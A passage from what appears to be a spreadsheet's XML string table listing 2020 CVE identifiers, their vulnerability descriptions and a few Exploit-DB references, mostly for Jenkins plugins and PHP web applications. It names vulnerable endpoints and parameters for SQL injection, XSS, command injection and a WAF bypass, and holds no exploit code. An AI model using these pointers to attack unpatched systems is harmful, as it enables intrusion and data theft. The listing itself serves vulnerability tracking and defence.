    <t>A remote code execution (RCE) vulnerability in /root/run/adm.php?admin-ediy&amp;part=exdiy of imcat v5.1 allows authenticated attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-22122</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in /oa.php?c=Staff&amp;a=read of Find a Place LJCMS v 1.3 allows attackers to access sensitive database information via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2020-22124</t>
  </si>
  <si>
    <t>A vulnerability in the \inc\config.php component of joyplus-cms v1.6 allows attackers to access sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-2213</t>
  </si>
  <si>
    <t>Jenkins White Source Plugin 19.1.1 and earlier stores credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission (config.xml), or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2214</t>
  </si>
  <si>
    <t>Jenkins ZAP Pipeline Plugin 1.9 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download.</t>
  </si>
  <si>
    <t>CVE-2020-22148</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in /admin.php?page=tags of Piwigo 2.10.1 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-2215</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Zephyr for JIRA Test Management Plugin 1.5 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified username and password.</t>
  </si>
  <si>
    <t>CVE-2020-22150</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in /admin.php?page=permalinks of Piwigo 2.10.1 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-22158</t>
  </si>
  <si>
    <t>MediaKind (formerly Ericsson) RX8200 5.13.3 devices are vulnerable to multiple reflected and stored XSS. An attacker has to inject JavaScript code directly in the "path" or "Services+ID" parameters and send the URL to a user in order to exploit reflected XSS. In the case of stored XSS, an attacker must modify the "name" parameter with the malicious code.</t>
  </si>
  <si>
    <t>CVE-2020-2216</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Zephyr for JIRA Test Management Plugin 1.5 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified username and password.</t>
  </si>
  <si>
    <t>CVE-2020-22164</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\check_availability.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22165</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\user-login.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22166</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\forgot-password.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22167</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a Persistent Cross-Site Scripting vulnerability in \hms\admin\appointment-history.php. Remote registered users can exploit the vulnerability to obtain user cookie data.</t>
  </si>
  <si>
    <t>CVE-2020-22168</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\change-emaild.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22169</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\appointment-history.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-2217</t>
  </si>
  <si>
    <t>Jenkins Compatibility Action Storage Plugin 1.0 and earlier does not escape the content coming from the MongoDB in the testConnection form validation endpoint, resulting in a reflected cross-site scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22170</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\get_doctor.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22171</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\registration.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22172</t>
  </si>
  <si>
    <t>CVE-2020-22173</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\edit-profile.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22174</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\book-appointment.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22175</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\admin\betweendates-detailsreports.php. Remote unauthenticated users can exploit the vulnerability to obtain database sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-22176</t>
  </si>
  <si>
    <t>PHPGurukul Hospital Management System in PHP v4.0 has a sensitive information disclosure vulnerability in multiple areas. Remote unauthenticated users can exploit the vulnerability to obtain user sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-2218</t>
  </si>
  <si>
    <t>Jenkins HP ALM Quality Center Plugin 1.6 and earlier stores a password unencrypted in its global configuration file on the Jenkins master where it can be viewed by users with access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2219</t>
  </si>
  <si>
    <t>Jenkins Link Column Plugin 1.0 and earlier does not filter URLs of links created by users with View/Configure permission, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22198</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in DedeCMS 5.7 via mdescription parameter to member/ajax_membergroup.php.</t>
  </si>
  <si>
    <t>CVE-2020-22199</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in phpCMS 2007 SP6 build 0805 via the digg_mod parameter to digg_add.php.</t>
  </si>
  <si>
    <t>CVE-2020-2220</t>
  </si>
  <si>
    <t>Jenkins 2.244 and earlier, LTS 2.235.1 and earlier does not escape the agent name in the build time trend page, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22200</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability in phpCMS 9.1.13 via the q parameter to public_get_suggest_keyword.</t>
  </si>
  <si>
    <t>CVE-2020-22201</t>
  </si>
  <si>
    <t>phpCMS 2008 sp4 allowas remote malicious users to execute arbitrary php commands via the pagesize parameter to yp/product.php.</t>
  </si>
  <si>
    <t>CVE-2020-22203</t>
  </si>
  <si>
    <t>SQL Injection in phpCMS 2008 sp4 via the genre parameter to yp/job.php.</t>
  </si>
  <si>
    <t>CVE-2020-22204</t>
  </si>
  <si>
    <t>SQL Injection in ECShop 2.7.6 via the goods_number parameter to flow.php. .</t>
  </si>
  <si>
    <t>CVE-2020-22205</t>
  </si>
  <si>
    <t>SQL Injection in ECShop 3.0 via the id parameter to admin/shophelp.php.</t>
  </si>
  <si>
    <t>CVE-2020-22206</t>
  </si>
  <si>
    <t>SQL Injection in ECShop 3.0 via the aid parameter to admin/affiliate_ck.php.</t>
  </si>
  <si>
    <t>CVE-2020-22208</t>
  </si>
  <si>
    <t>SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.</t>
  </si>
  <si>
    <t>CVE-2020-22209</t>
  </si>
  <si>
    <t>SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.</t>
  </si>
  <si>
    <t>CVE-2020-2221</t>
  </si>
  <si>
    <t>Jenkins 2.244 and earlier, LTS 2.235.1 and earlier does not escape the upstream job's display name shown as part of a build cause, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22210</t>
  </si>
  <si>
    <t>SQL Injection in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.</t>
  </si>
  <si>
    <t>CVE-2020-22211</t>
  </si>
  <si>
    <t>SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.</t>
  </si>
  <si>
    <t>CVE-2020-22212</t>
  </si>
  <si>
    <t>SQL Injection in 74cms 3.2.0 via the id parameter to wap/wap-company-show.php.</t>
  </si>
  <si>
    <t>CVE-2020-2222</t>
  </si>
  <si>
    <t>Jenkins 2.244 and earlier, LTS 2.235.1 and earlier does not escape the job name in the 'Keep this build forever' badge tooltip, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22222</t>
  </si>
  <si>
    <t>Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the pjActionLoadCss function.</t>
  </si>
  <si>
    <t>CVE-2020-22223</t>
  </si>
  <si>
    <t>Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionLoad function.</t>
  </si>
  <si>
    <t>CVE-2020-22224</t>
  </si>
  <si>
    <t>Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the pjActionPreview function.</t>
  </si>
  <si>
    <t>CVE-2020-22225</t>
  </si>
  <si>
    <t>Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionLoadForm function.</t>
  </si>
  <si>
    <t>CVE-2020-22226</t>
  </si>
  <si>
    <t>Stivasoft (Phpjabbers) Fundraising Script v1.0 was discovered to contain a SQL injection vulnerability via the pjActionSetAmount function.</t>
  </si>
  <si>
    <t>CVE-2020-2223</t>
  </si>
  <si>
    <t>Jenkins 2.244 and earlier, LTS 2.235.1 and earlier does not escape correctly the 'href' attribute of links to downstream jobs displayed in the build console page, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2224</t>
  </si>
  <si>
    <t>Jenkins Matrix Project Plugin 1.16 and earlier does not escape the node names shown in tooltips on the overview page of builds with a single axis, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22249</t>
  </si>
  <si>
    <t>Remote Code Execution vulnerability in phplist 3.5.1. The application does not check any file extensions stored in the plugin zip file, Uploading a malicious plugin which contains the php files with extensions like PHP,phtml,php7 will be copied to the plugins directory which would lead to the remote code execution</t>
  </si>
  <si>
    <t>CVE-2020-2225</t>
  </si>
  <si>
    <t>Jenkins Matrix Project Plugin 1.16 and earlier does not escape the axis names shown in tooltips on the overview page of builds with multiple axes, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22251</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in phpList 3.5.3 via the login name field in Manage Administrators when adding a new admin.</t>
  </si>
  <si>
    <t>CVE-2020-22253</t>
  </si>
  <si>
    <t>Xiongmai Technology Co devices AHB7008T-MH-V2, AHB7804R-ELS, AHB7804R-MH-V2, AHB7808R-MS-V2, AHB7808R-MS, AHB7808T-MS-V2, AHB7804R-LMS, and HI3518E_50H10L_S39 were all discovered to have port 9530 open which allows unauthenticated attackers to make arbitrary Telnet connections with the victim device.</t>
  </si>
  <si>
    <t>CVE-2020-2226</t>
  </si>
  <si>
    <t>Jenkins Matrix Authorization Strategy Plugin 2.6.1 and earlier does not escape user names shown in the configuration, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2227</t>
  </si>
  <si>
    <t>Jenkins Deployer Framework Plugin 1.2 and earlier does not escape the URL displayed in the build home page, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22273</t>
  </si>
  <si>
    <t>Neoflex Video Subscription System Version 2.0 is affected by CSRF which allows the Website's Settings to be changed (such as Payment Settings)</t>
  </si>
  <si>
    <t>CVE-2020-22274</t>
  </si>
  <si>
    <t>JomSocial (Joomla Social Network Extention) 4.7.6 allows CSV injection via a customer's profile.</t>
  </si>
  <si>
    <t>CVE-2020-22275</t>
  </si>
  <si>
    <t>Easy Registration Forms (ER Forms) Wordpress Plugin 2.0.6 allows an attacker to submit an entry with malicious CSV commands. After that, when the system administrator generates CSV output from the forms information, there is no check on this inputs and the codes are executable.</t>
  </si>
  <si>
    <t>CVE-2020-22276</t>
  </si>
  <si>
    <t>WeForms Wordpress Plugin 1.4.7 allows CSV injection via a form's entry.</t>
  </si>
  <si>
    <t>CVE-2020-22277</t>
  </si>
  <si>
    <t>Import and export users and customers WordPress Plugin through 1.15.5.11 allows CSV injection via a customer's profile.</t>
  </si>
  <si>
    <t>CVE-2020-22278</t>
  </si>
  <si>
    <t>** DISPUTED ** phpMyAdmin through 5.0.2 allows CSV injection via Export Section. NOTE: the vendor disputes this because "the CSV file is accurately generated based on the database contents."</t>
  </si>
  <si>
    <t>CVE-2020-2228</t>
  </si>
  <si>
    <t>Jenkins Gitlab Authentication Plugin 1.5 and earlier does not perform group authorization checks properly, resulting in a privilege escalation vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22283</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the icmp6_send_response_with_addrs_and_netif() function of Free Software Foundation lwIP version git head allows attackers to access sensitive information via a crafted ICMPv6 packet.</t>
  </si>
  <si>
    <t>CVE-2020-22284</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the zepif_linkoutput() function of Free Software Foundation lwIP git head version and version 2.1.2 allows attackers to access sensitive information via a crafted 6LoWPAN packet.</t>
  </si>
  <si>
    <t>CVE-2020-2229</t>
  </si>
  <si>
    <t>Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons, resulting in a stored cross-site scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>exploits/java/webapps/49232.txt</t>
  </si>
  <si>
    <t>Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting</t>
  </si>
  <si>
    <t>2020-12-11</t>
  </si>
  <si>
    <t>CVE-2020-2230</t>
  </si>
  <si>
    <t>Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission.</t>
  </si>
  <si>
    <t>exploits/java/webapps/49237.txt</t>
  </si>
  <si>
    <t>Jenkins 2.235.3 - 'Description' Stored XSS</t>
  </si>
  <si>
    <t>CVE-2020-2231</t>
  </si>
  <si>
    <t>Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely', resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token.</t>
  </si>
  <si>
    <t>exploits/java/webapps/49244.txt</t>
  </si>
  <si>
    <t>Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS</t>
  </si>
  <si>
    <t>2020-12-14</t>
  </si>
  <si>
    <t>CVE-2020-22312</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability was discovered in the OJ/admin-tool /cal_scores.php function of HZNUOJ v1.0.</t>
  </si>
  <si>
    <t>CVE-2020-2232</t>
  </si>
  <si>
    <t>Jenkins Email Extension Plugin 2.72 and 2.73 transmits and displays the SMTP password in plain text as part of the global Jenkins configuration form, potentially resulting in its exposure.</t>
  </si>
  <si>
    <t>CVE-2020-2233</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Pipeline Maven Integration Plugin 3.8.2 and earlier allows users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-22330</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS) vulnerability in Subrion 4.2.1 via the title when adding a page.</t>
  </si>
  <si>
    <t>CVE-2020-2234</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Pipeline Maven Integration Plugin 3.8.2 and earlier allows users with Overall/Read access to connect to an attacker-specified JDBC URL using attacker-specified credentials IDs obtained through another method, potentially capturing credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-22345</t>
  </si>
  <si>
    <t>/graphStatus/displayServiceStatus.php in Centreon 19.10.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the RRDdatabase_path parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2235</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Pipeline Maven Integration Plugin 3.8.2 and earlier allows attackers to connect to an attacker-specified JDBC URL using attacker-specified credentials IDs obtained through another method, potentially capturing credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-22352</t>
  </si>
  <si>
    <t>The gf_dash_segmenter_probe_input function in GPAC v0.8 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.</t>
  </si>
  <si>
    <t>CVE-2020-2236</t>
  </si>
  <si>
    <t>Jenkins Yet Another Build Visualizer Plugin 1.11 and earlier does not escape tooltip content, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users with Run/Update permission.</t>
  </si>
  <si>
    <t>CVE-2020-2237</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins Flaky Test Handler Plugin 1.0.4 and earlier allows attackers to rebuild a project at a previous git revision.</t>
  </si>
  <si>
    <t>CVE-2020-2238</t>
  </si>
  <si>
    <t>Jenkins Git Parameter Plugin 0.9.12 and earlier does not escape the repository field on the 'Build with Parameters' page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2239</t>
  </si>
  <si>
    <t>Jenkins Parameterized Remote Trigger Plugin 3.1.3 and earlier stores a secret unencrypted in its global configuration file on the Jenkins controller where it can be viewed by attackers with access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-22390</t>
  </si>
  <si>
    <t>Akaunting &lt;= 2.0.9 is vulnerable to CSV injection in the Item name field, export function. Attackers can inject arbitrary code into the name parameter and perform code execution when the crafted file is opened.</t>
  </si>
  <si>
    <t>CVE-2020-22392</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.2 when adding a blog and then editing an image file.</t>
  </si>
  <si>
    <t>CVE-2020-22394</t>
  </si>
  <si>
    <t>In YzmCMS v5.5 the member contribution function in the editor contains a cross-site scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2240</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins database Plugin 1.6 and earlier allows attackers to execute arbitrary SQL scripts.</t>
  </si>
  <si>
    <t>CVE-2020-22403</t>
  </si>
  <si>
    <t>The express-cart package through 1.1.10 for Node.js allows CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-2241</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Jenkins database Plugin 1.6 and earlier allows attackers to connect to an attacker-specified database server using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-2242</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins database Plugin 1.6 and earlier allows attackers with Overall/Read access to Jenkins to connect to an attacker-specified database server using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-22421</t>
  </si>
  <si>
    <t>74CMS v6.0.4 was discovered to contain a cross-site scripting (XSS) vulnerability via /index.php?m=&amp;c=help&amp;a=help_list&amp;key.</t>
  </si>
  <si>
    <t>CVE-2020-22425</t>
  </si>
  <si>
    <t>Centreon 19.10-3.el7 is affected by a SQL injection vulnerability, where an authorized user is able to inject additional SQL queries to perform remote command execution.</t>
  </si>
  <si>
    <t>CVE-2020-22427</t>
  </si>
  <si>
    <t>** DISPUTED ** NagiosXI 5.6.11 is affected by a remote code execution (RCE) vulnerability. An authenticated nagiosadmin user can inject additional commands into a request. NOTE: the vendor disputes whether the CVE and its references are actionable because all technical details are omitted, and the only option is to pay for a subscription service where technical details may be disclosed at an unspecified later time.</t>
  </si>
  <si>
    <t>CVE-2020-22428</t>
  </si>
  <si>
    <t>SolarWinds Serv-U before 15.1.6 Hotfix 3 is affected by Cross Site Scripting (XSS) via a directory name (entered by an admin) containing a JavaScript payload.</t>
  </si>
  <si>
    <t>CVE-2020-2243</t>
  </si>
  <si>
    <t>Jenkins Cadence vManager Plugin 3.0.4 and earlier does not escape build descriptions in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Run/Update permission.</t>
  </si>
  <si>
    <t>CVE-2020-2244</t>
  </si>
  <si>
    <t>Jenkins Build Failure Analyzer Plugin 1.27.0 and earlier does not escape matching text in a form validation response, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers able to provide console output for builds used to test build log indications.</t>
  </si>
  <si>
    <t>CVE-2020-2245</t>
  </si>
  <si>
    <t>Jenkins Valgrind Plugin 0.28 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-22453</t>
  </si>
  <si>
    <t>Untis WebUntis before 2020.9.6 allows XSS in multiple functions that store information.</t>
  </si>
  <si>
    <t>CVE-2020-2246</t>
  </si>
  <si>
    <t>Jenkins Valgrind Plugin 0.28 and earlier does not escape content in Valgrind XML reports, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control Valgrind XML report contents.</t>
  </si>
  <si>
    <t>CVE-2020-2247</t>
  </si>
  <si>
    <t>Jenkins Klocwork Analysis Plugin 2020.2.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-22474</t>
  </si>
  <si>
    <t>In webERP 4.15, the ManualContents.php file allows users to specify the "Language" parameter, which can lead to local file inclusion.</t>
  </si>
  <si>
    <t>CVE-2020-22475</t>
  </si>
  <si>
    <t>"Tasks" application version before 9.7.3 is affected by insecure permissions. The VoiceCommandActivity application component allows arbitrary applications on a device to add tasks with no restrictions.</t>
  </si>
  <si>
    <t>CVE-2020-2248</t>
  </si>
  <si>
    <t>Jenkins JSGames Plugin 0.2 and earlier evaluates part of a URL as code, resulting in a reflected cross-site scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22481</t>
  </si>
  <si>
    <t>An issue was discovered in HFish 0.5.1. When a payload is inserted where the password is entered, XSS code is triggered when the administrator views the information.</t>
  </si>
  <si>
    <t>CVE-2020-2249</t>
  </si>
  <si>
    <t>Jenkins Team Foundation Server Plugin 5.157.1 and earlier stores a webhook secret unencrypted in its global configuration file on the Jenkins controller where it can be viewed by attackers with access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-2250</t>
  </si>
  <si>
    <t>Jenkins SoapUI Pro Functional Testing Plugin 1.3 and earlier stores project passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by attackers with Extended Read permission, or access to the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-2251</t>
  </si>
  <si>
    <t>Jenkins SoapUI Pro Functional Testing Plugin 1.5 and earlier transmits project passwords in its configuration in plain text as part of job configuration forms, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-2252</t>
  </si>
  <si>
    <t>Jenkins Mailer Plugin 1.32 and earlier does not perform hostname validation when connecting to the configured SMTP server.</t>
  </si>
  <si>
    <t>CVE-2020-2253</t>
  </si>
  <si>
    <t>Jenkins Email Extension Plugin 2.75 and earlier does not perform hostname validation when connecting to the configured SMTP server.</t>
  </si>
  <si>
    <t>CVE-2020-22535</t>
  </si>
  <si>
    <t>Incorrect Access Control vulnerability in PbootCMS 2.0.6 via the list parameter in the update function in upgradecontroller.php.</t>
  </si>
  <si>
    <t>CVE-2020-2254</t>
  </si>
  <si>
    <t>Jenkins Blue Ocean Plugin 1.23.2 and earlier provides an undocumented feature flag that, when enabled, allows an attacker with Job/Configure or Job/Create permission to read arbitrary files on the Jenkins controller file system.</t>
  </si>
  <si>
    <t>CVE-2020-2255</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Blue Ocean Plugin 1.23.2 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL.</t>
  </si>
  <si>
    <t>CVE-2020-22550</t>
  </si>
  <si>
    <t>Veno File Manager 3.5.6 is affected by a directory traversal vulnerability. Using the traversal allows an attacker to download sensitive files from the server.</t>
  </si>
  <si>
    <t>CVE-2020-22552</t>
  </si>
  <si>
    <t>The Snap7 server component in version 1.4.1, when an attacker sends a crafted packet with COTP protocol the last-data-unit flag set to No and S7 writes a var function, the Snap7 server will be crashed.</t>
  </si>
  <si>
    <t>CVE-2020-2256</t>
  </si>
  <si>
    <t>Jenkins Pipeline Maven Integration Plugin 3.9.2 and earlier does not escape the upstream job's display name shown as part of a build cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2257</t>
  </si>
  <si>
    <t>Jenkins Validating String Parameter Plugin 2.4 and earlier does not escape various user-controlled fields, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2258</t>
  </si>
  <si>
    <t>Jenkins Health Advisor by CloudBees Plugin 3.2.0 and earlier does not correctly perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to view that HTTP endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-2259</t>
  </si>
  <si>
    <t>Jenkins computer-queue-plugin Plugin 1.5 and earlier does not escape the agent name in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2260</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Perfecto Plugin 1.17 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified HTTP URL using attacker-specified credentials.</t>
  </si>
  <si>
    <t>CVE-2020-22607</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerabilty in LimeSurvey 4.1.11+200316 via the (1) name and (2) description parameters in application/controllers/admin/PermissiontemplatesController.php.</t>
  </si>
  <si>
    <t>CVE-2020-22608</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerability in Enhancesoft osTicket before v1.12.6 via the queue-name parameter to include/ajax.search.php.</t>
  </si>
  <si>
    <t>CVE-2020-22609</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Enhancesoft osTicket before v1.12.6 via the queue-name parameter in include/class.queue.php.</t>
  </si>
  <si>
    <t>CVE-2020-2261</t>
  </si>
  <si>
    <t>Jenkins Perfecto Plugin 1.17 and earlier executes a command on the Jenkins controller, allowing attackers with Job/Configure permission to run arbitrary commands on the Jenkins controller</t>
  </si>
  <si>
    <t>CVE-2020-22617</t>
  </si>
  <si>
    <t>Ardour v5.12 contains a use-after-free vulnerability in the component ardour/libs/pbd/xml++.cc when using xmlFreeDoc and xmlXPathFreeContext.</t>
  </si>
  <si>
    <t>CVE-2020-2262</t>
  </si>
  <si>
    <t>Jenkins Android Lint Plugin 2.6 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step.</t>
  </si>
  <si>
    <t>CVE-2020-2263</t>
  </si>
  <si>
    <t>Jenkins Radiator View Plugin 1.29 and earlier does not escape the full name of the jobs in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2264</t>
  </si>
  <si>
    <t>Jenkins Custom Job Icon Plugin 0.2 and earlier does not escape the job descriptions in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-22643</t>
  </si>
  <si>
    <t>Feehi CMS 2.1.0 is affected by an arbitrary file upload vulnerability, potentially resulting in remote code execution. After an administrator logs in, open the administrator image upload page to potentially upload malicious files.</t>
  </si>
  <si>
    <t>CVE-2020-2265</t>
  </si>
  <si>
    <t>Jenkins Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not escape the method information in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step.</t>
  </si>
  <si>
    <t>CVE-2020-22650</t>
  </si>
  <si>
    <t>A memory leak vulnerability in sim-organizer.c of AlienVault Ossim v5 causes a denial of service (DOS) via a system crash triggered by the occurrence of a large number of alarm events.</t>
  </si>
  <si>
    <t>CVE-2020-2266</t>
  </si>
  <si>
    <t>Jenkins Description Column Plugin 1.3 and earlier does not escape the job description in the column tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-22669</t>
  </si>
  <si>
    <t>Modsecurity owasp-modsecurity-crs 3.2.0 (Paranoia level at PL1) has a SQL injection bypass vulnerability. Attackers can use the comment characters and variable assignments in the SQL syntax to bypass Modsecurity WAF protection and implement SQL injection attacks on Web applications.</t>
  </si>
  <si>
    <t>CVE-2020-2267</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins MongoDB Plugin 1.3 and earlier allows attackers with Overall/Read permission to gain access to some metadata of any arbitrary files on the Jenkins controller.</t>
  </si>
  <si>
    <t>CVE-2020-22673</t>
  </si>
  <si>
    <t>Memory leak in the senc_Parse function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2020-22674</t>
  </si>
  <si>
